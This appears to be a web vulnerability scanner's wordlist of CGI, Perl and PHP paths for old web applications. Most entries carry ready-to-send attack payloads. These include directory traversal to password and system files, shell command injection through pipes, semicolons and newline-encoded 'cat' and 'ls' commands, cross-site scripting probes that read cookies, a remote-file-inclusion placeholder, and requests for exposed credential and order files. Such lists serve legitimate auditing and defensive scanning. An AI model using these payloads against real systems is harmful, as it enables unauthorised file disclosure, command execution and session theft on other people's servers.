.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
